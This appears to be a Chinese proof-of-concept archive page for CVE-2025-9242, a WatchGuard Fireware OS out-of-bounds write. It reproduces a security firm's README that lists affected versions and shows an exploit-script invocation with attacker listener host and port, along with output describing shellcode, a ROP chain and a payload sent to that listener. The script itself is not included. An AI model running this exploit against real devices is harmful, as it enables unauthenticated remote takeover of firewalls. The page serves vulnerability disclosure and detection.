POC详情: db82b092627ef2dfda7d484c2d0315df6f642101

来源
关联漏洞
标题: WatchGuard Fireware OS 安全漏洞 (CVE-2025-9242)
描述:WatchGuard Fireware OS是美国WatchGuard公司的一个在 Firebox 上运行的软件。 WatchGuard Fireware OS 11.10.2版本至11.12.4_Update1版本、12.0版本至12.11.3版本和2025.1版本存在安全漏洞,该漏洞源于越界写入,可能导致远程未经验证的攻击者执行任意代码。
介绍
# watchTowr-vs-WatchGuard-CVE-2025-9242

Detection Artifact Generator for WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action

```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```

# Description

This script attempts to detect if WatchGuard OS is vulnerable to CVE-2025-9242.

# Affected Versions

The following versions of WatchGuard OS are Affected

| Vulnerable Version              | Resolved Version         |
| ------------------------------- | ------------------------ |
| 2025.1                          | 2025.1.1                 |
| 12.x                            | 12.11.4                  |
| 12.5.x (T15 & T35 models)       | 12.5.13                  |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x                            | End of Life              |

For more information visit [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber
文件快照

[4.0K] /data/pocs/db82b092627ef2dfda7d484c2d0315df6f642101 ├── [2.5K] README.md └── [ 67K] watchTowr-vs-WatchGuard-CVE-2025-9242.py 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。